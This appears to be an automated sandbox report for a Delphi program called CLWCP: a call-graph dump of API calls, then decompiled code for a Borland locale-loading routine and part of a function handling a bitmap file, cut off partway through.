33932 4392b2 33922->33932 33923 438d8b 33937 4334cc 105 API calls 33923->33937 33951 438f64 75 API calls 33924->33951 33926->33930 33928->33923 33949 438ea0 73 API calls 33928->33949 33930->33923 33939 435eb4 33930->33939 33931 4392f3 33931->33930 33934 4392f7 33931->33934 33932->33923 33933 4392dd NtdllDefWindowProc_A 33932->33933 33933->33923 33934->33923 33935 435eb4 171 API calls 33934->33935 33936 439311 33935->33936 33936->33923 33937->33629 33938->33631 33941 435eca 33939->33941 33940 435f12 33942 435fa5 33940->33942 33952 4515b4 33940->33952 33941->33940 33941->33942 33943 435f8a 33941->33943 33945 435f7f 33941->33945 33942->33923 33958 4570d0 137 API calls 33943->33958 33945->33940 33946 435fe6 GetKeyboardState 33945->33946 33947 436002 33946->33947 33947->33942 33949->33923 33950->33922 33951->33931 33953 4515c3 33952->33953 33959 44fb80 33953->33959 33956 4515e3 33956->33942 33958->33940 33960 44fc14 33959->33960 33969 44fba4 33959->33969 33962 44fc25 33960->33962 33995 449164 88 API calls 33960->33995 33963 44fc65 33962->33963 33965 44fcfd 33962->33965 33966 44fcd8 33963->33966 33974 44fc80 33963->33974 33964 44fd17 33968 44fd29 33964->33968 33986 44fcd6 33964->33986 33965->33964 33970 44fd11 SetMenu 33965->33970 33966->33964 33977 44fcec 33966->33977 33967 453af4 72 API calls 33967->33969 33998 44fab8 78 API calls 33968->33998 33969->33960 33969->33967 33988 405c70 33969->33988 33994 40b86c 72 API calls 33969->33994 33970->33964 33974->33964 33981 44fca3 GetMenu 33974->33981 33975 44fd30 33976 40411c 41 API calls 33975->33976 33979 44fd45 33976->33979 33980 44fcf5 SetMenu 33977->33980 33979->33956 33987 4514b8 10 API calls 33979->33987 33980->33964 33982 44fcad 33981->33982 33983 44fcc6 33981->33983 33985 44fcc0 SetMenu 33982->33985 33996 449164 88 API calls 33983->33996 33985->33983 33986->33964 33997 451074 80 API calls 33986->33997 33987->33956 33989 405c81 33988->33989 33990 405cb2 33988->33990 33989->33990 33999 4051b8 33989->33999 33990->33969 33993 40420c 41 API calls 33993->33990 33994->33969 33995->33962 33996->33986 33997->33968 33998->33975 34000 4051dd LoadStringA 33999->34000 34001 4051c7 33999->34001 34000->33993 34001->34000 34003 405170 34001->34003 34004 405180 GetModuleFileNameA 34003->34004 34005 40519c 34003->34005 34007 4053d4 GetModuleFileNameA RegOpenKeyExA 34004->34007 34005->34000 34008 405457 34007->34008 34009 405417 RegOpenKeyExA 34007->34009 34025 405210 12 API calls 34008->34025 34009->34008 34010 405435 RegOpenKeyExA 34009->34010 34010->34008 34012 4054e0 lstrcpyn GetThreadLocale GetLocaleInfoA 34010->34012 34016 405517 34012->34016 34017 4055fa 34012->34017 34013 40547c RegQueryValueExA 34014 40549c RegQueryValueExA 34013->34014 34015 4054ba RegCloseKey 34013->34015 34014->34015 34015->34005 34016->34017 34019 405527 lstrlen 34016->34019 34017->34005 34020 40553f 34019->34020 34020->34017 34021 405564 lstrcpyn LoadLibraryExA 34020->34021 34022 40558c 34020->34022 34021->34022 34022->34017 34023 405596 lstrcpyn LoadLibraryExA 34022->34023 34023->34017 34024 4055c8 lstrcpyn LoadLibraryExA 34023->34024 34024->34017 34025->34013 34026 42a688 34029 43848c 34026->34029 34030 4384bf 34029->34030 34031 438538 GetClassInfoA 34030->34031 34036 405c70 72 API calls 34030->34036 34046 4384ec 34030->34046 34032 43855f 34031->34032 34033 43859d 34032->34033 34034 438570 UnregisterClassA 34032->34034 34035 43857d RegisterClassA 34032->34035 34057 43865c 34033->34057 34034->34035 34035->34033 34037 438598 34035->34037 34039 438521 34036->34039 34077 40cafc 74 API calls 34037->34077 34076 40b86c 72 API calls 34039->34076 34041 4385c1 GetWindowLongA 34044 4385f7 34041->34044 34045 4385d6 GetWindowLongA 34041->34045 34060 408ae4 41 API calls 34044->34060 34045->34044 34047 4385e8 SetWindowLongA 34045->34047 34046->34031 34047->34044 34049 4385ff 34079 43bd64 7 API calls 34049->34079 34051 43860b 34061 41d650 34051->34061 34053 438615 34054 40411c 41 API calls 34053->34054 34055 42a6af 34054->34055 34080 406ac4 34057->34080 34059 4385b3 34059->34041 34078 40cafc 74 API calls 34059->34078 34060->34049 34062 41d7f1 34061->34062 34063 41d685 34061->34063 34087 404140 41 API calls 34062->34087 34085 41c984 RtlEnterCriticalSection 34063->34085 34066 41d811 34068 40411c 41 API calls 34066->34068 34067 41d7d2 34086 41c990 RtlLeaveCriticalSection 34067->34086 34069 41d819 34068->34069 34069->34053 34071 41d7e9 34071->34053 34072 41d68f 34072->34067 34073 41d743 CompareStringA 34072->34073 34074 41d757 34073->34074 34075 41d7c3 CreateFontIndirectA 34074->34075 34075->34067 34076->34046 34077->34033 34078->34041 34079->34051 34084 402b3c 34080->34084 34082 406ad7 CreateWindowExA 34083 406b11 34082->34083 34083->34059 34084->34082 34085->34072 34086->34071 34087->34066 34088 46d52c 34099 405f24 GetModuleHandleA 34088->34099 34090 46d53c 34103 455e44 34090->34103 34094 46d57c 34118 4563e4 144 API calls 34094->34118 34096 46d588 34097 404028 41 API calls 34096->34097 34098 46d58d 34097->34098 34100 405f57 34099->34100 34119 403e7c 34100->34119 34104 455e66 34103->34104 34105 455ea3 34103->34105 34368 455df8 34104->34368 34106 404170 41 API calls 34105->34106 34113 455ea1 34106->34113 34108 40411c 41 API calls 34109 455ec5 34108->34109 34114 456364 34109->34114 34110 455e70 34111 455e8c SetWindowTextA 34110->34111 34110->34113 34112 40411c 41 API calls 34111->34112 34112->34113 34113->34108 34115 456377 34114->34115 34374 44ddac 34115->34374 34116 456398 34116->34094 34118->34096 34120 403eaf 34119->34120 34123 403e14 34120->34123 34124 403e24 34123->34124 34125 403e57 34123->34125 34124->34125 34126 405170 30 API calls 34124->34126 34128 4026e4 41 API calls 34124->34128 34131 441090 34124->34131 34145 40d62c 34124->34145 34159 40d62a 34124->34159 34125->34090 34126->34124 34128->34124 34132 441108 34131->34132 34133 4410aa GetVersion 34131->34133 34132->34124 34173 440e40 GetCurrentProcessId 34133->34173 34137 4410ce 34205 413600 74 API calls 34137->34205 34139 4410d8 34206 4135ac 74 API calls 34139->34206 34141 4410e8 34207 4135ac 74 API calls 34141->34207 34143 4410f8 34208 4135ac 74 API calls 34143->34208 34146 40d686 34145->34146 34147 40d646 34145->34147 34146->34124 34350 403ebc 34147->34350 34149 40d672 34354 40bee4 34149->34354 34150 40d650 34150->34149 34151 404170 41 API calls 34150->34151 34151->34149 34155 40d67c 34361 40cbf4 GetModuleHandleA 34155->34361 34158 40c77c 87 API calls 34158->34146 34160 40d62c 34159->34160 34161 40d686 34160->34161 34162 403ebc 72 API calls 34160->34162 34161->34124 34164 40d650 34162->34164 34163 40d672 34166 40bee4 72 API calls 34163->34166 34164->34163 34165 404170 41 API calls 34164->34165 34165->34163 34167 40d677 34166->34167 34168 40bfe8 GetVersionExA 34167->34168 34169 40d67c 34168->34169 34170 40cbf4 2 API calls 34169->34170 34171 40d681 34170->34171 34172 40c77c 87 API calls 34171->34172 34172->34161 34209 408f74 34173->34209 34176 404170 41 API calls 34177 440e89 34176->34177 34178 440e93 GlobalAddAtomA GetCurrentThreadId 34177->34178 34179 408f74 72 API calls 34178->34179 34180 440ecd 34179->34180 34181 404170 41 API calls 34180->34181 34182 440eda 34181->34182 34183 440ee4 GlobalAddAtomA 34182->34183 34184 4045dc 34183->34184 34185 440efa RegisterClipboardFormatA 34184->34185 34212 413f44 34185->34212 34187 440f11 34216 440a48 34187->34216 34189 440f1b 34224 440870 34189->34224 34191 440f27 34228 45385c 34191->34228 34193 440f3a 34245 454a70 34193->34245 34195 440f50 34261 4136ec 74 API calls 34195->34261 34197 440f7a GetModuleHandleA 34198 440f9a 34197->34198 34199 440f8a GetProcAddress 34197->34199 34200 40411c 41 API calls 34198->34200 34199->34198 34201 440faf 34200->34201 34202 40411c 41 API calls 34201->34202 34203 440fb7 34202->34203 34204 413560 74 API calls 34203->34204 34204->34137 34205->34139 34206->34141 34207->34143 34208->34132 34262 408f88 34209->34262 34213 413f4a 34212->34213 34214 413f5f RtlInitializeCriticalSection 34213->34214 34215 413f74 34214->34215 34215->34187 34217 440bb5 34216->34217 34218 440a5c SetErrorMode 34216->34218 34217->34189 34219 440a80 GetModuleHandleA GetProcAddress 34218->34219 34220 440a9c 34218->34220 34219->34220 34221 440b97 SetErrorMode 34220->34221 34222 440aa9 LoadLibraryA 34220->34222 34221->34189 34222->34221 34223 440ac5 10 API calls 34222->34223 34223->34221 34225 440876 34224->34225 34226 4409e4 9 API calls 34225->34226 34227 4408e4 34226->34227 34227->34191 34229 453866 34228->34229 34277 419ae4 34229->34277 34231 45387c 34281 453c18 LoadCursorA 34231->34281 34234 4538b5 34235 4538f1 72E7AC50 72E7AD70 72E7B380 34234->34235 34236 453927 34235->34236 34286 41d468 34236->34286 34238 453933 34239 41d468 43 API calls 34238->34239 34240 453945 34239->34240 34241 41d468 43 API calls 34240->34241 34242 453957 34241->34242 34243 454054 54 API calls 34242->34243 34244 453964 34243->34244 34244->34193 34246 454a7f 34245->34246 34247 419ae4 72 API calls 34246->34247 34248 454a95 34247->34248 34249 454b52 LoadIconA 34248->34249 34304 42476c 34249->34304 34251 454b75 GetModuleFileNameA OemToCharA 34252 454bbe 34251->34252 34253 454be4 CharNextA CharLowerA 34252->34253 34254 454c0c 34253->34254 34306 41ac4c GetClassInfoA 34254->34306 34257 454c2e 34340 457044 41 API calls 34257->34340 34260 454c50 34260->34195 34261->34197 34263 408fad 34262->34263 34265 408fd8 34263->34265 34275 408b7c 72 API calls 34263->34275 34266 409035 34265->34266 34273 408fef 34265->34273 34267 40420c 41 API calls 34266->34267 34269 408f83 34267->34269 34268 40902a 34270 404768 41 API calls 34268->34270 34269->34176 34270->34269 34271 40411c 41 API calls 34271->34273 34272 404768 41 API calls 34272->34273 34273->34268 34273->34271 34273->34272 34276 408b7c 72 API calls 34273->34276 34275->34265 34276->34273 34278 419aeb 34277->34278 34280 419b10 34278->34280 34290 419ca0 72 API calls 34278->34290 34280->34231 34282 453c37 34281->34282 34283 453c50 LoadCursorA 34282->34283 34285 45389f GetKeyboardLayout 34282->34285 34291 453cd4 34283->34291 34285->34234 34287 41d46e 34286->34287 34294 41c99c 34287->34294 34289 41d490 34289->34238 34290->34280 34292 4026e4 41 API calls 34291->34292 34293 453ce7 34292->34293 34293->34282 34295 41c9b7 34294->34295 34302 41c984 RtlEnterCriticalSection 34295->34302 34297 41c9c1 34298 4026e4 41 API calls 34297->34298 34300 41ca1e 34297->34300 34298->34300 34303 41c990 RtlLeaveCriticalSection 34300->34303 34301 41ca6f 34301->34289 34302->34297 34303->34301 34305 424778 34304->34305 34305->34251 34307 41ac7c 34306->34307 34308 41aca5 34307->34308 34309 41ac9b RegisterClassA 34307->34309 34310 41ac8a UnregisterClassA 34307->34310 34311 406ac4 CreateWindowExA 34308->34311 34309->34308 34310->34309 34312 41acd3 34311->34312 34313 41acf0 34312->34313 34341 41ab90 34312->34341 34313->34257 34316 454dbc 34313->34316 34315 41ace7 SetWindowLongA 34315->34313 34317 454f47 34316->34317 34318 454de5 34316->34318 34319 40411c 41 API calls 34317->34319 34318->34317 34320 41ab90 VirtualAlloc 34318->34320 34321 454f5c 34319->34321 34322 454dfe GetClassInfoA 34320->34322 34321->34257 34323 454e24 RegisterClassA 34322->34323 34328 454e59 34322->34328 34324 454e3d 34323->34324 34323->34328 34325 405c70 72 API calls 34324->34325 34326 454e4a 34325->34326 34348 40b830 41 API calls 34326->34348 34344 406b1c 34328->34344 34330 454eb0 34331 40411c 41 API calls 34330->34331 34332 454ebe SetWindowLongA 34331->34332 34333 454ede 34332->34333 34334 454f09 GetSystemMenu DeleteMenu DeleteMenu 34332->34334 34335 455bd0 79 API calls 34333->34335 34334->34317 34336 454f3a DeleteMenu 34334->34336 34337 454ee5 SendMessageA 34335->34337 34336->34317 34338 455bd0 79 API calls 34337->34338 34339 454efd SetClassLongA 34338->34339 34339->34334 34340->34260 34342 41aba0 VirtualAlloc 34341->34342 34343 41abce 34341->34343 34342->34343 34343->34315 34349 402b3c 34344->34349 34346 406b2f CreateWindowExA 34347 406b67 34346->34347 34347->34330 34348->34328 34349->34346 34351 403ec8 34350->34351 34352 405c70 72 API calls 34351->34352 34353 403edd 34351->34353 34352->34351 34353->34150 34364 40b8ec 34354->34364 34356 40bef6 34357 40b8ec 72 API calls 34356->34357 34358 40bf0d 34357->34358 34359 40bfe8 GetVersionExA 34358->34359 34360 40bfff 34359->34360 34360->34155 34362 40cc15 34361->34362 34363 40cc05 GetProcAddress 34361->34363 34362->34158 34363->34362 34365 40b8f3 34364->34365 34366 405c70 72 API calls 34365->34366 34367 40b90b 34366->34367 34367->34356 34369 455e2d 34368->34369 34370 455e0d GetWindowTextA 34368->34370 34372 404170 41 API calls 34369->34372 34371 40420c 41 API calls 34370->34371 34373 455e2b 34371->34373 34372->34373 34373->34110 34375 44ddc2 34374->34375 34376 44ded6 34375->34376 34383 413ae4 34375->34383 34376->34116 34378 44de52 34379 405c70 72 API calls 34378->34379 34382 44de9b 34378->34382 34380 44de89 34379->34380 34393 40b86c 72 API calls 34380->34393 34382->34116 34384 413afa 34383->34384 34385 413b2f 34384->34385 34406 413958 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 34384->34406 34394 413a3c 34385->34394 34389 413b5a 34391 413b72 34389->34391 34408 4139e0 72 API calls 34389->34408 34391->34378 34393->34382 34396 413a66 34394->34396 34405 413aba 34394->34405 34395 40411c 41 API calls 34397 413ad1 34395->34397 34398 413a3c 150 API calls 34396->34398 34396->34405 34397->34389 34407 4139b0 72 API calls 34397->34407 34399 413a7e 34398->34399 34409 405168 34399->34409 34402 4051b8 30 API calls 34403 413aac 34402->34403 34412 4138d4 34403->34412 34405->34395 34406->34385 34407->34389 34408->34391 34421 405140 VirtualQuery 34409->34421 34413 4138e5 34412->34413 34414 4138f4 FindResourceA 34413->34414 34415 413951 34414->34415 34416 413904 34414->34416 34415->34405 34423 4163e8 34416->34423 34418 413915 34427 415ed4 34418->34427 34420 413930 34420->34405 34422 40515a 34421->34422 34422->34402 34424 4163f2 34423->34424 34432 4164e0 FindResourceA 34424->34432 34426 416422 34426->34418 34444 416594 34427->34444 34429 415ef0 34448 418760 34429->34448 34431 415f0b 34431->34420 34433 416505 34432->34433 34434 41650c LoadResource 34432->34434 34442 416440 72 API calls 34433->34442 34435 416526 SizeofResource LockResource 34434->34435 34436 41651f 34434->34436 34441 416544 34435->34441 34443 416440 72 API calls 34436->34443 34439 41650b 34439->34434 34440 416525 34440->34435 34441->34426 34442->34439 34443->34440 34445 41659e 34444->34445 34446 4026e4 41 API calls 34445->34446 34447 4165b7 34446->34447 34447->34429 34477 418b50 34448->34477 34451 4187d8 34538 418b74 34451->34538 34452 41880d 34453 418b74 72 API calls 34452->34453 34456 41881e 34453->34456 34458 418834 34456->34458 34459 418827 34456->34459 34460 418b74 72 API calls 34458->34460 34462 418b74 72 API calls 34459->34462 34463 41884f 34460->34463 34461 4187eb 34465 418b74 72 API calls 34461->34465 34466 418800 34462->34466 34548 418700 72 API calls 34463->34548 34465->34466 34482 4131d4 34466->34482 34470 4188ab 34473 41893b 34470->34473 34501 41e9ac 34470->34501 34511 44e4c0 34470->34511 34534 41e6e8 34470->34534 34471 41897b 34471->34431 34472 413d2c 72 API calls 34472->34473 34473->34471 34473->34472 34549 417244 34477->34549 34480 418799 34480->34451 34480->34452 34483 4131e1 34482->34483 34555 4130c0 RtlEnterCriticalSection 34483->34555 34485 4132bb 34556 413178 RtlLeaveCriticalSection 34485->34556 34486 413d2c 72 API calls 34491 413218 34486->34491 34489 4132d2 34493 405ed8 34489->34493 34490 413d2c 72 API calls 34492 41327a 34490->34492 34491->34486 34491->34492 34557 412bfc 72 API calls 34491->34557 34492->34485 34492->34490 34494 405ee7 34493->34494 34495 405f0d TlsGetValue 34493->34495 34494->34470 34496 405ef2 34495->34496 34497 405f17 34495->34497 34558 405e94 LocalAlloc TlsSetValue 34496->34558 34497->34470 34499 405ef7 TlsGetValue 34500 405f06 34499->34500 34500->34470 34502 41e9c8 34501->34502 34506 41ea15 34501->34506 34503 41e9ec 34502->34503 34510 40b8ec 72 API calls 34502->34510 34504 41e9fd 34503->34504 34559 41ea4c 48 API calls 34503->34559 34507 41ea09 34504->34507 34560 41ea78 6 API calls 34504->34560 34506->34473 34507->34506 34561 41eaa8 10 API calls 34507->34561 34510->34503 34512 44e4d3 34511->34512 34562 43749c 34512->34562 34514 44e5a1 34567 44e898 90 API calls 34514->34567 34515 44e532 34515->34514 34517 44e69e 34515->34517 34520 44e592 MulDiv 34515->34520 34522 44e704 34517->34522 34570 44daa0 80 API calls 34517->34570 34518 44e5ba 34518->34517 34568 44daa0 80 API calls 34518->34568 34566 41d864 45 API calls 34520->34566 34521 44e6f2 34571 43b514 72 API calls 34521->34571 34522->34473 34526 44e5db 34569 43b514 72 API calls 34526->34569 34528 44e5ee 34529 44e61d 34528->34529 34530 44e5fa MulDiv 34528->34530 34531 44e64c 34529->34531 34532 44e629 MulDiv 34529->34532 34530->34529 34531->34517 34533 44e658 MulDiv MulDiv 34531->34533 34532->34531 34533->34517 34535 41e9ac 89 API calls 34534->34535 34536 41e6ff 34535->34536 34537 41e718 GetTextExtentPoint32A 34536->34537 34537->34473 34539 417244 72 API calls 34538->34539 34540 418b89 34539->34540 34541 40420c 41 API calls 34540->34541 34542 418b96 34541->34542 34576 404634 34542->34576 34545 417244 72 API calls 34546 4187e3 34545->34546 34547 413484 74 API calls 34546->34547 34547->34461 34548->34466 34551 41724f 34549->34551 34550 417289 34550->34480 34553 416c3c 72 API calls 34550->34553 34551->34550 34554 417290 72 API calls 34551->34554 34553->34480 34554->34551 34555->34491 34556->34489 34557->34491 34558->34499 34559->34504 34560->34507 34561->34506 34563 4374ae 34562->34563 34572 433f94 34563->34572 34565 4374c6 34565->34515 34566->34514 34567->34518 34568->34526 34569->34528 34570->34521 34571->34522 34573 433fb0 34572->34573 34574 419f50 112 API calls 34573->34574 34575 433fc6 34574->34575 34575->34565 34577 4045e8 34576->34577 34578 4041e0 41 API calls 34577->34578 34579 404623 34577->34579 34580 4045ff 34578->34580 34579->34545 34580->34579 34582 402704 41 API calls 34580->34582 34582->34579 34583 4388d8 72E89840 34584 438909 34583->34584 34585 43890e 34583->34585 34587 40cafc 74 API calls 34584->34587 34587->34585 34588 459058 34589 459074 34588->34589 34597 415bc8 34589->34597 34593 4590ba 34594 459181 34593->34594 34601 459364 41 API calls 34593->34601 34596 4590f5 34602 406a7c GlobalAlloc GlobalFix 34597->34602 34598 415bd6 34600 415d70 72 API calls 34598->34600 34600->34593 34601->34596 34602->34598

                                  Executed Functions

                                  Function 004053D4, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 65%
                                  			E004053D4(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4054d9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405210( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405640, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004054E0);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L004012A4();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L004012AC();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L004012A4();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L004012A4();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L004012A4();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                  0x004053d5
                                  0x004053d7
                                  0x004053df
                                  0x004053f0
                                  0x004053f5
                                  0x0040540e
                                  0x00405415
                                  0x00405457
                                  0x00405459
                                  0x0040545a
                                  0x0040545f
                                  0x00405462
                                  0x00405465
                                  0x00405477
                                  0x0040549a
                                  0x004054ba
                                  0x004054ba
                                  0x004054be
                                  0x004054c4
                                  0x004054c7
                                  0x004054ca
                                  0x004054d8
                                  0x00405417
                                  0x0040542c
                                  0x00405433
                                  0x00000000
                                  0x00405435
                                  0x0040544a
                                  0x00405451
                                  0x004054e0
                                  0x004054e8
                                  0x004054ef
                                  0x004054f0
                                  0x00405503
                                  0x00405508
                                  0x00405511
                                  0x00405527
                                  0x0040552d
                                  0x0040552e
                                  0x0040553b
                                  0x00405540
                                  0x0040553f
                                  0x0040553f
                                  0x0040554f
                                  0x00405557
                                  0x0040555d
                                  0x00405562
                                  0x0040556f
                                  0x00405573
                                  0x00405574
                                  0x00405575
                                  0x0040558a
                                  0x0040558a
                                  0x0040558e
                                  0x004055a7
                                  0x004055ab
                                  0x004055ac
                                  0x004055ad
                                  0x004055bd
                                  0x004055c2
                                  0x004055c6
                                  0x004055c8
                                  0x004055dd
                                  0x004055e1
                                  0x004055e2
                                  0x004055e3
                                  0x004055f3
                                  0x004055f8
                                  0x004055f8
                                  0x004055c6
                                  0x0040558e
                                  0x00405557
                                  0x00405601
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405451
                                  0x00405433

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00000000), ref: 004053F0
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 0040540E
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 0040542C
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0040544A
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004054D9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405493
                                  • RegQueryValueExA.ADVAPI32(?,00405640,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004054D9,?,80000001), ref: 004054B1
                                  • RegCloseKey.ADVAPI32(?,004054E0,00000000,?,?,00000000,004054D9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004054D3
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004054F0
                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004054FD
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405503
                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040552E
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405575
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405585
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004055AD
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004055BD
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004055E3
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 004055F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1759228003-2375825460
                                  • Opcode ID: ff9a8cdb042367f31b6c6ce243410d3c0e109033cb35c317e927d531fa39734c
                                  • Instruction ID: 3c0e3e78233f0a82dd65aa9a4c52d1a41be1d032bd59ece1fa712f95d871d3c8
                                  • Opcode Fuzzy Hash: ff9a8cdb042367f31b6c6ce243410d3c0e109033cb35c317e927d531fa39734c
                                  • Instruction Fuzzy Hash: 82515175A0065C7AEB21D6A4CC46FEF77ACDB04744F4000BBBA04F61C1E6BC9A448FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0046CF80, Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 213registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 60%
                                  			E0046CF80(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				void* _t63;
				void* _t103;
				void* _t153;
				void* _t154;
				char* _t155;
				intOrPtr _t163;
				int _t186;
				char* _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t193;
				void* _t196;

				_t190 = _t191;
				_t156 = 5;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
				} while (_t156 != 0);
				_push(_t156);
				_v8 = __edx;
				_t153 = __eax;
				E004045CC(_v8);
				_push(_t190);
				_push(0x46d23e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				_t63 = E0040850C(_v8); // executed
				_t193 = _t63 + 1;
				if(_t193 == 0) {
					L22:
					_pop(_t163);
					 *[fs:eax] = _t163;
					_push(0x46d245);
					E00404140( &_v48, 9);
					return E0040411C( &_v8);
				}
				E004043DC(_v8);
				E00404304();
				E00407D2C(_v20, _t156,  &_v16);
				E00404528(_v16, 0x46d254);
				if(_t193 == 0) {
					E00420878( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x33c)) + 0x170)), E00458034(1));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x33c)) + 0x170)) + 0xc)))) + 0x4c))();
					 *((intOrPtr*)( *((intOrPtr*)(E00420860( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x340)) + 0x170))))) + 8))();
					_push(E00420860( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x340)) + 0x170))));
					E0046CF50( &_v24);
					E004043E4( &_v24, "\\clwcp.bmp");
					 *((intOrPtr*)( *_t146 + 0x50))();
					E0046CF50( &_v28);
					_t156 = "\\clwcp.bmp";
